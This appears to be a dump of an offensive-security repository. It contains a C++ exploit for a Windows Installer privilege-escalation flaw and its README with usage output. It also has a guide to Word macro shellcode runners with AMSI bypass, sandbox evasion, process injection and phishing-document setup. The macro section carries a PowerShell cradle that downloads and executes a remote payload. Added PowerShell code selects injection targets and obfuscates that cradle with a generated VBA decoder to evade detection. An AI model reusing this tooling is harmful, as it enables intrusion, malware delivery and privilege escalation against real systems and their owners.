| return EXIT_FAILURE; 81 | } 82 | 83 | if (help_option->is_set()) 84 | { 85 | std::cout << op << std::endl; 86 | return EXIT_SUCCESS; 87 | } 88 | 89 | std::cout << "[+] User provided MSI path: " << msi_path->value() << std::endl; 90 | std::cout << "[+] The target path is: " << target_path->value() << std::endl; 91 | 92 | std::string adjusted_target("\\??\\"); 93 | adjusted_target.append(target_path->value()); 94 | Exploit exp_obj(msi_path->value(), adjusted_target, i_path->value()); 95 | exp_obj.load_ntdll(); 96 | if (!exp_obj.create_temp_files()) 97 | { 98 | std::cerr << "[-] 
Creating the temp files failed" << std::endl; 99 | return EXIT_FAILURE; 100 | } 101 | 102 | std::thread doExploit(&Exploit::exploit_thread, &exp_obj); 103 | 104 | std::this_thread::sleep_for(std::chrono::milliseconds(1000)); 105 | if (!install_msi(msi_path->value(), i_path->value())) 106 | { 107 | std::cout << "[-] Install MSI return a bad value" << std::endl; 108 | return EXIT_SUCCESS; 109 | } 110 | doExploit.join(); 111 | std::cout << "[+] Exploit thread joined" << std::endl; 112 | std::cout << "[+] Copy into target!" << std::endl; 113 | 114 | char current_path[MAX_PATH]; 115 | GetModuleFileNameA(GetModuleHandle(NULL), current_path, MAX_PATH); 116 | CopyFileA(copy_path->value().c_str(), target_path->value().c_str(), FALSE); 117 | StartElevationSvc(); 118 | return EXIT_SUCCESS; 119 | } 120 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/D_invoke.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31605.320 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Builder", "Builder\Builder.csproj", "{3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "exe", "exe\exe.csproj", "{4D5A47FE-B129-4E48-987B-1D10E80F08B4}" 9 | EndProject 10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "dll", "dll\dll.csproj", "{567418BD-F614-46A1-AF01-66C28121F538}" 11 | EndProject 12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "service", "service\service.csproj", "{D614AA1C-E918-43B7-9A76-7EDF6545D530}" 13 | EndProject 14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "test", "test\test.csproj", "{50AE1F0A-AC50-4A06-98E0-B7091E8341B0}" 15 | EndProject 16 | Global 17 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 18 | Debug|Any 
CPU = Debug|Any CPU 19 | Debug|x64 = Debug|x64 20 | Release|Any CPU = Release|Any CPU 21 | Release|x64 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 24 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 25 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|Any CPU.Build.0 = Debug|Any CPU 26 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|x64.ActiveCfg = Release|x64 27 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Debug|x64.Build.0 = Release|x64 28 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|Any CPU.ActiveCfg = Release|Any CPU 29 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|Any CPU.Build.0 = Release|Any CPU 30 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|x64.ActiveCfg = Release|x64 31 | {3F3C7F96-CDCD-4D8B-9F4B-80A51712D49C}.Release|x64.Build.0 = Release|x64 32 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 33 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|Any CPU.Build.0 = Debug|Any CPU 34 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|x64.ActiveCfg = Release|x64 35 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Debug|x64.Build.0 = Release|x64 36 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|Any CPU.ActiveCfg = Release|Any CPU 37 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|Any CPU.Build.0 = Release|Any CPU 38 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|x64.ActiveCfg = Release|x64 39 | {4D5A47FE-B129-4E48-987B-1D10E80F08B4}.Release|x64.Build.0 = Release|x64 40 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 41 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|Any CPU.Build.0 = Debug|Any CPU 42 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|x64.ActiveCfg = Release|x64 43 | {567418BD-F614-46A1-AF01-66C28121F538}.Debug|x64.Build.0 = Release|x64 44 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|Any CPU.ActiveCfg = Release|Any CPU 45 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|Any CPU.Build.0 = Release|Any 
CPU 46 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|x64.ActiveCfg = Release|x64 47 | {567418BD-F614-46A1-AF01-66C28121F538}.Release|x64.Build.0 = Release|x64 48 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 49 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|Any CPU.Build.0 = Debug|Any CPU 50 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|x64.ActiveCfg = Release|x64 51 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Debug|x64.Build.0 = Release|x64 52 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|Any CPU.ActiveCfg = Release|Any CPU 53 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|Any CPU.Build.0 = Release|Any CPU 54 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|x64.ActiveCfg = Release|x64 55 | {D614AA1C-E918-43B7-9A76-7EDF6545D530}.Release|x64.Build.0 = Release|x64 56 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 57 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|Any CPU.Build.0 = Debug|Any CPU 58 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|x64.ActiveCfg = Debug|Any CPU 59 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Debug|x64.Build.0 = Debug|Any CPU 60 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|Any CPU.ActiveCfg = Release|Any CPU 61 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|Any CPU.Build.0 = Release|Any CPU 62 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|x64.ActiveCfg = Release|x64 63 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0}.Release|x64.Build.0 = Release|x64 64 | EndGlobalSection 65 | GlobalSection(SolutionProperties) = preSolution 66 | HideSolutionNode = FALSE 67 | EndGlobalSection 68 | GlobalSection(ExtensibilityGlobals) = postSolution 69 | SolutionGuid = {137C93F7-A8EB-46F2-B766-75881839821E} 70 | EndGlobalSection 71 | EndGlobal 72 | -------------------------------------------------------------------------------- /Privilege_Escalation/shakeitoff/README.md: -------------------------------------------------------------------------------- 1 | # NOTE: 2 | 3 | This version of 
shakeitoff has been altered and combined with parts of the original InstallerFileTakeOver (linked below in the original README by the author of shakeitoff) in order to achieve code execution after overwriting the target binary, by leveraging the MicrosoftEdgeElevationService. This of course requires that Edge is installed on the target machine and that the service exists. This has been tested on Win10, Win11, Server 2K16, and Server 2K19. Additionally, a switch was added to allow the user to specify which file they wish to overwrite the target file with (as opposed to the original PoCs, which overwrote the target file with the PoC itself).

# shakeitoff

A smaller, minimized, and cleaner version of [InstallerFileTakeOver](https://github.com/klinix5/InstallerFileTakeOver), aka the zero-day exploit that is a "variation" of CVE-2021-41379. This version *does not* pop a shell like `InstallerFileTakeOver`. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writability). Demonstrating code execution is a trivial exercise left up to the reader.

To understand how the attack works, please see the [AttackerKB write up](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis).

## Usage

The tool requires three parameters:

```
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
```

1. -m - the MSI to install (full path required). One is provided in this repository (and you should use it, since the file paths actually matter).
2. -i - the install path (full path required). This is where the MSI is installed / the exploit goes down. The user must specify this beforehand and it *must* be an empty directory. The tool doesn't clean it up because that makes figuring out the bug easier. There also must be a trailing \ because I'm a monster.
3. -p - the file to overwrite/create. Full path required.

The PoC will just copy itself into the target file.

## Usage Example

```
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free
```

## Credit

* This code is influenced by the original [exploit](https://github.com/klinix5/InstallerFileTakeOver) published by Abdelhamid Naceri (also the original vulnerability discoverer!).
* The `FileOpLock` code is a (slightly modified) version pulled out of [angrypolarbearbug2](https://github.com/jackusm/polarbearrepo/tree/f37184a3fc3ffa5ea76035c9fbdee95a39d7b4c3/angrypolarbearbug2).
* Taylor Swift

-------------------------------------------------------------------------------- /Macros/README.md: --------------------------------------------------------------------------------

# Macro Shellcode Runners

## ToC

| Application | Notes |
| ----------- | ----- |
| `WordMacroInject.vbs` | Injects shellcode into `explorer.exe` (64-bit Word) or a random 32-bit process, and runs it |
| `WordMacroRunner.vbs` | Loads shellcode into `WINWORD.exe` and runs it |
| `WordMacroRunnerBasic.vbs` | Basic shellcode runner: `WordMacroRunner.vbs` without AMSI bypass or IP check |
| `WordPsCradle.vbs` | Macro with Caesar Cipher encoding that calls a PS download cradle |
| `vbObfuscate.ps1` | PS script to generate Caesar Cipher code for `WordPsCradle.vbs` |

Both `WordMacroInject.vbs` and `WordMacroRunner.vbs` have:
- Ability to run when executed from both 64-bit & 32-bit Word
- AMSI Check & Bypass
- Simple time-based AV Sandbox detection

### Setup/formatting information:
1. Write the "legitimate" contents of the Word doc, select all, then navigate to Insert > Quick Parts > AutoText > Save Selection to AutoText Gallery.
2. Give it a name and make sure it's saved to that particular document and not a template. Hit OK. Then delete the content from the body of the Word doc.
3. Copy in/write your pretexting content to the body of the Word doc. This is the piece that includes "enable macros, hit this key combo to execute", etc.
4. Go to Macros and click Record New Macro. Ensure on both screens you select the current document and not a template. Click Keyboard and then hit a key combination to map (e.g. Alt + D). Once you hit OK/Close, recording will begin. Then click Macros again, View, select the main runner sub, and click Run. This maps that sequence to Alt + D, so that when it is entered the runner sub is executed.

## `WordMacroInject.vbs`
This macro performs process injection from both 32-bit and 64-bit Word processes. In 64-bit processes, it injects into `explorer.exe`, but this is easily configurable with a single variable.

In 32-bit processes, it enumerates running processes and attempts to find another 32-bit process to inject into. These are pretty sparse, but often processes like `GoogleUpdate.exe` and `OneDrive.exe` are running as 32-bit (at least in the OSEP labs). If it can't find another 32-bit process, it injects into itself (`WINWORD.exe`).
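The 32-bit target hunt described above, as an added PowerShell example (this is not the macro's own VBA and not code from the repository): it lists the WOW64 processes on a 64-bit host with the real `kernel32!IsWow64Process` export and picks a target in the same order of preference the macro uses. The `Demo.Native` type name and the `Select-InjectionTarget` helper are choices made here; the preferred process names are the ones the README mentions. It only enumerates, it does not inject.

```powershell
# Added example, not code from the macro repository: enumerate WOW64 (32-bit) processes on a
# 64-bit Windows host, which is the hunt WordMacroInject.vbs has to do from 32-bit Word.
# Demo.Native is a name chosen here; IsWow64Process is the real kernel32 export.
Add-Type -Namespace Demo -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)] out bool wow64);
'@

function Get-Wow64Process {
    # Returns the processes running under WOW64, i.e. 32-bit images on a 64-bit OS.
    if (-not [Environment]::Is64BitOperatingSystem) { return }   # nothing is WOW64 on a 32-bit OS
    foreach ($p in Get-Process) {
        try { $h = $p.Handle } catch { continue }   # protected or other users' processes: skip
        if ($null -eq $h) { continue }
        $isWow64 = $false
        if ([Demo.Native]::IsWow64Process($h, [ref]$isWow64) -and $isWow64) { $p }
    }
}

function Select-InjectionTarget {
    # Same order of preference as the macro: a known 32-bit helper first, then any other
    # 32-bit process, then ourselves. Preferred names are the ones the README mentions.
    param([string[]]$Preferred = @('OneDrive', 'GoogleUpdate'))
    $candidates = @(Get-Wow64Process | Where-Object { $_.Id -ne $PID })
    foreach ($name in $Preferred) {
        $hit = $candidates | Where-Object { $_.ProcessName -eq $name } | Select-Object -First 1
        if ($hit) { return $hit }
    }
    if ($candidates.Count -gt 0) { return $candidates[0] }
    return Get-Process -Id $PID   # nothing else is 32-bit: fall back to self, as the macro does
}

Get-Wow64Process | Select-Object Id, ProcessName, Path | Format-Table -AutoSize
$target = Select-InjectionTarget
"Would inject into PID $($target.Id) ($($target.ProcessName))"
```

To reproduce the macro's situation exactly, run this from the 32-bit host (`%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`), so that the self fallback is a 32-bit process like 32-bit `WINWORD.exe`; from a 64-bit PowerShell the listing is the same but the fallback is 64-bit. Processes whose handle cannot be opened (protected processes, other users' processes when not elevated) are skipped, which is also why the candidate list is usually so short.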

Uses a `sleep` call to determine if it is being simulated by AV. The shellcode is not obfuscated at all; that is left up to the reader. Much more could be done to obfuscate the entire script, but doing so here would make the script hard to even understand, which would defeat its educational purpose.

### Notes

If Word (and thus our macro) is run in 32-bit mode, we have to find another 32-bit process to inject into, because 32-bit processes cannot easily inject into 64-bit ones. The presumed typical target environment will be running 32-bit Word on a 64-bit OS, which renders injection into the 64-bit `explorer.exe` impossible.

Starting with Word 2019 the program is 64-bit by default. This means Word 2019, O365 and 2021 are all good candidates for injection, because orgs/individuals would have to go out of their way to download the 32-bit build.

There are some more advanced techniques out there that might facilitate 32→64-bit injection (*Heaven's Gate*), but no idea if they could be implemented in VBA.

As always, there are stability issues, and concerns about the longevity of the host process needed to maintain a reverse shell, when we inject into random processes. In reality, just using a non-injecting runner and then letting the C2 auto-migrate is probably best practice, as C2 frameworks are equipped to do so.

## `WordMacroRunner.vbs`
This is a baseline runner that loads the shellcode into `WINWORD.exe` and executes it. It can detect AMSI and patch it if found (for both 32-bit and 64-bit), and it contains shellcode for both 32-bit and 64-bit Word so it can execute after detecting the architecture.

Uses a `sleep` call to determine if it is being simulated by AV. Also has functionality to make sure the target is in the `192.168.0.0/16` IP range, but you have to uncomment it.

The shellcode is not obfuscated at all; that is left up to the reader. Much more could be done to obfuscate the entire script, but doing so here would make the script hard to even understand, which would defeat its educational purpose.

## `WordMacroRunnerBasic.vbs`
This is just a basic version of `WordMacroRunner.vbs` without the AMSI bypass or IP check.

## `WordPsCradle.vbs`
Macro with Caesar Cipher encoding that calls a PowerShell download cradle. Use it with `vbObfuscate.ps1` to generate and replace the obfuscated text in `WordPsCradle.vbs`. The cradle is launched via WMI (dechaining), so the PowerShell process is spawned by WMI as a native 64-bit process rather than as a child of Word: **still use x64 shellcode even if you are targeting x86 Word**!

## `vbObfuscate.ps1`
PowerShell script to generate Caesar Cipher code for `WordPsCradle.vbs`. Make sure the offsets match for encrypt/decrypt. The first output is the download cradle; the last is the app name for the app-name check before running.

**This is where you would edit the PS cradle you would like to run**. The default is:
```ps1
powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/attach.txt')
```
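The Caesar encode/decode pairing that `vbObfuscate.ps1` and `WordPsCradle.vbs` rely on, as an added PowerShell example; this is not the repository's `vbObfuscate.ps1`, and the design is mine: the encoder, the round-trip guard and the emitted VBA decoder are all driven by one `$Offset` variable, so the offset mismatch the README warns about cannot happen silently. It goes beyond the page in one way: it rotates over the 95 printable ASCII characters instead of a plain code-point shift, so the output stays printable and VBA's `Asc`/`Chr` round-trip it without codepage surprises. The offset value `17`, the app-name value `Microsoft Word`, and the VBA function name `Decode` are assumptions; the cradle string is the README's default.

```powershell
# Added example, not the repository's vbObfuscate.ps1: Caesar-shift a PowerShell cradle and the
# app name the macro checks, and emit the VBA decoder from the SAME $Offset so the encode and
# decode shifts cannot drift apart. Rotation is over printable ASCII (0x20-0x7E, 95 symbols).

function ConvertTo-CaesarString {
    param([Parameter(Mandatory)][string]$Text, [Parameter(Mandatory)][int]$Offset)
    if ($Offset -lt 1 -or $Offset -gt 94) { throw 'Offset must be 1..94' }
    $out = foreach ($c in $Text.ToCharArray()) {
        $code = [int]$c
        if ($code -lt 32 -or $code -gt 126) { throw ('Non-printable or non-ASCII input: U+{0:X4}' -f $code) }
        [char](32 + (($code - 32 + $Offset) % 95))
    }
    -join $out
}

function ConvertFrom-CaesarString {
    # Exact inverse of ConvertTo-CaesarString for the same $Offset (used here as a self-check).
    param([Parameter(Mandatory)][string]$Text, [Parameter(Mandatory)][int]$Offset)
    $out = foreach ($c in $Text.ToCharArray()) {
        [char](32 + (([int]$c - 32 - $Offset + 95) % 95))
    }
    -join $out
}

function New-VbaDecoder {
    # VBA function that reverses ConvertTo-CaesarString; $Offset is baked in from the same variable.
    param([Parameter(Mandatory)][int]$Offset)
@"
Function Decode(s As String) As String
    Dim i As Integer, r As String
    For i = 1 To Len(s)
        r = r & Chr(32 + ((Asc(Mid(s, i, 1)) - 32 - $Offset + 95) Mod 95))
    Next i
    Decode = r
End Function
"@
}

function ConvertTo-VbaLiteral {
    # Double embedded quotes so the encoded text is a valid VBA string literal.
    param([Parameter(Mandatory)][string]$Text)
    '"' + $Text.Replace('"', '""') + '"'
}

$Offset  = 17                 # assumed value; the repository's scripts choose their own
$cradle  = "powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/attach.txt')"
$appName = 'Microsoft Word'   # assumed value for the app-name check; the README does not state it

$encCradle = ConvertTo-CaesarString -Text $cradle  -Offset $Offset
$encApp    = ConvertTo-CaesarString -Text $appName -Offset $Offset

# Round-trip guard: fail loudly if encode and decode disagree instead of shipping a broken macro.
if ((ConvertFrom-CaesarString -Text $encCradle -Offset $Offset) -ne $cradle) { throw 'Caesar round-trip failed' }
if ((ConvertFrom-CaesarString -Text $encApp    -Offset $Offset) -ne $appName) { throw 'Caesar round-trip failed' }

# Same output order as the README describes for vbObfuscate.ps1: cradle first, app name last.
"cradle = $(ConvertTo-VbaLiteral $encCradle)"
New-VbaDecoder -Offset $Offset
"app = $(ConvertTo-VbaLiteral $encApp)"
```

Paste the three outputs into the macro and call `Decode(cradle)` / `Decode(app)` at runtime. Changing `$Offset` regenerates both the strings and the decoder together, which is the whole point: with the repository's scripts the offset lives in two files, and the README's "make sure offsets match" warning exists because nothing checks that they do.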